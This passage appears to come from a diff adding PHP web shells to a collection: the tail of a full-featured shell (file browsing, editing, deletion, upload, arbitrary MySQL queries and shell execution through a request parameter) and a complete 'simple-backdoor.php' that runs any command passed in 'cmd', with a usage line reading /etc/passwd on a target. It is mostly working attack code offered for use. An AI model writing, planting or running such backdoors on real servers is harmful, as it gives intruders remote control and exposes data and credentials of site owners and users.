if (is_dir("$d$slash$dir"))
{
if($dir != "." && $dir !="..")
$dirList[]=$dir;
}
else
{
if(isset($_REQUEST["hldb"]))
{
$contents=file_get_contents("$d$slash$dir");
if (stripos($contents, "mysql_") || stripos($contents, "mysqli_") || stripos($contents, "SELECT "))
{
$fileList[]=array('dir'=>$dir,'color'=>'red');
}
else
{
$fileList[]=array('dir'=>$dir,'color'=>'black');
}
}
else
{
$fileList[]=array('dir'=>$dir,'color'=>'black');
}
}
}
echo "<a href='?d=$d$slash.'><font color=grey>.\n</font></a>";
echo "<a href='?d=$d$slash..'><font color=grey>..\n</font></a>";
//Some configurations throw a notice if is_array is tried with a non-existant variable
if(isset($dirList))
if(is_array($dirList))
foreach($dirList as $dir)
{
echo "<a href='?d=$d$slash$dir'><font color=grey>$dir\n</font></a>";
}
if(isset($fileList))
if(is_array($fileList))
foreach($fileList as $dir)
{
echo "<a href='?f=$d" . $slash . $dir['dir'] . "'><font color=" . $dir['color'] . ">" . $dir['dir'] . "</font></a>" .
"|<a href='?dl=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir"] . "' target='_blank'>Download</a>|" .
"|<a href='?ef=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir"] . "' target='_blank'>Edit</a>|" .
"|<a href='?df=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir"] . "' target='_blank'>Delete</a>| \n";
}
}
else
echo "opendir() failed";
closedir($handle);
}
elseif(isset($_REQUEST['c']))
{
if( @ini_get('safe_mode') )
{
echo 'Safe mode is on, the command is by default run though escapeshellcmd() and can only run programms in safe_mod_exec_dir (' . @ini_get('safe_mode_exec_dir') . ') <br />';
}
echo "<b>Command: <I>" . $_REQUEST['c'] . "</I></b><br /><br />";
trim(exec($_REQUEST['c'],$return));
foreach($return as $val)
{
echo '<pre>' . htmlentities($val) . '</pre>';
}
}
elseif(isset($_REQUEST['uploadForm']) || isset($_FILES["file_name"]))
{
if(isset($_FILES["file_name"]))
{
if ($_FILES["file_name"]["error"] > 0)
{
echo "Error";
}
else
{
$target_path = $_COOKIE["uploadDir"];
if(substr($target_path,-1) != "/")
$target_path .= "/";
$target_path = $target_path . basename( $_FILES['file_name']['name']);
if(move_uploaded_file($_FILES['file_name']['tmp_name'], $target_path)) {
setcookie("uploadDir","");
echo "The file ". basename( $_FILES['file_name']['name']).
" has been uploaded";
}
else
{
echo "Error copying file, likely a permission error.";
}
}
}
else
{
?>
<form target="_blank" action="" method="GET">
<input type="hidden" name="cc" value="1" />
Submit this form before submitting file (will open in new window):<br />
Upload Directory: <input type="text" name="dir" value="<?php echo $_REQUEST["dir"] ?>"><br />
<input type="submit" value="submit" />
</form>
<br /><br />
<form enctype="multipart/form-data" action="" method="post">
Upload file:<input name="file_name" type="file"> <input type="submit" value="Upload" /></form>
<?php
}
}
elseif(isset($_REQUEST['cc']))
{
setcookie("uploadDir",$_GET["dir"]);
echo "You are OK to upload the file, don't upload files to other directories before completing this upload.";
}
elseif(isset($_REQUEST['mquery']))
{
$host=$_REQUEST['host'];
$usr=$_REQUEST['usr'];
$passwd=$_REQUEST['passwd'];
$db=$_REQUEST['db'];
$mquery=$_REQUEST['mquery'];
@mysql_connect($host, $usr, $passwd) or die("Connection Error: " . mysql_error());
mysql_select_db($db);
$result = mysql_query($mquery);
if($result!=false)
{
echo "<h2>The following query has sucessfully executed</h2>" . htmlentities($mquery) . "<br /><br />";
echo "Return Results:<br />";
$first=true;
echo "<table border='1'>";
while ($row = mysql_fetch_array($result,MYSQL_ASSOC))
{
if($first)
{
echo "<tr>";
foreach($row as $key=>$val)
{
echo "<td><b>$key</b></td>";
}
echo "</tr>";
reset($row);
$first=false;
}
echo "<tr>";
foreach($row as $val)
{
echo "<td>$val</td>";
}
echo "</tr>";
}
echo "</table>";
mysql_free_result($result);
}
else
{
echo "Query Error: " . mysql_error();
}
}
elseif(isset($_REQUEST['df']))
{
$_REQUEST['df'] .= $slash . $_REQUEST['file'];
if(@unlink($_REQUEST['df']))
{
echo "File deleted";
}
else
{
echo "Error deleting file";
}
}
elseif(isset($_REQUEST['ef']))
{
?>
<script type="text/javascript">
<!--
var key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
function encode64(inpStr)
{
inpStr = escape(inpStr);
var output = "";
var chr1, chr2, chr3 = "";
var enc1, enc2, enc3, enc4 = "";
var i = 0;
do {
chr1 = inpStr.charCodeAt(i++);
chr2 = inpStr.charCodeAt(i++);
chr3 = inpStr.charCodeAt(i++);
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;
if (isNaN(chr2))
{
enc3 = enc4 = 64;
}
else if (isNaN(chr3))
{
enc4 = 64;
}
output = output +
key.charAt(enc1) +
key.charAt(enc2) +
key.charAt(enc3) +
key.charAt(enc4);
chr1 = chr2 = chr3 = enc1 = enc2 = enc3 = enc4 = "";
} while (i < inpStr.length);
return output;
}
//--></script>
<?php
$_REQUEST['ef'] .= $_REQUEST['file'];
if(isset($_POST["newcontent"]))
{
$_POST["newcontent"]=urldecode(base64_decode($_POST["newcontent"]));
$stream=@fopen($_REQUEST['ef'],"w");
if($stream)
{
fwrite($stream,$_POST["newcontent"]);
echo "Write sucessful";
}
else
{
echo "Could not write to file";
}
fclose($stream);
}
?>
<form action="" name="f" method="POST">
<textarea wrap="off" rows="40" cols="130" name="newcontent"><?php echo file_get_contents($_REQUEST['ef']) ?></textarea><br />
<input type="submit" value="I base64 encoded it myself, dont run script" /><br />
<input type="submit" value="Change (requires javascript to work)" onclick="document.f.newcontent.value=encode64(document.f.newcontent.value);" />
</form>
<?php
}
else
{
?>
<b>Server Information:</b><br />
<i>
Operating System: <?php echo PHP_OS ?><br />
PHP Version: <?php echo PHP_VERSION ?><br />
<a href="?phpinfo=true">View phpinfo</a>
</i>
<br />
<br />
<b>Directory Traversal</b><br />
<a href="?d=<?php echo getcwd() ?>"><b>Go to current working directory</b></a> <br />
<a href="?d=<?php echo $rootDir ?>"><b>Go to root directory</b></a> <br />
<b>Go to any directory:</b> <form action="" method="GET"><input type="text" name="d" value="<?php echo $rootDir ?>" /><input type="submit" value="Go" /></form>
<hr>Execute MySQL Query:
<form action="" METHOD="GET" >
<table>
<tr><td>host</td><td><input type="text" name="host"value="localhost"> </td></tr>
<tr><td>user</td><td><input type="text" name="usr" value="root"> </td></tr>
<tr><td>password</td><td><input type="text" name="passwd"> </td></tr>
<tr><td>database</td><td><input type="text" name="db"> </td></tr>
<tr><td valign="top">query</td><td><textarea name="mquery" rows="6" cols="65"></textarea> </td></tr>
<tr><td colspan="2"><input type="submit" value="execute"></td></tr>
</table>
</form>
<hr>
<pre><form action="" METHOD="GET" >Execute Shell Command (safe mode is <?php echo (@ini_get('safe_mode') ? 'on' : 'off') ?>): <input type="text" name="c"><input type="submit" value="Go"></form>
<?php
}
//Intentionally left open to avoid output the file download function 1

17
php/simple-backdoor.php Normal file
View file

@ -0,0 +1,17 @@
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->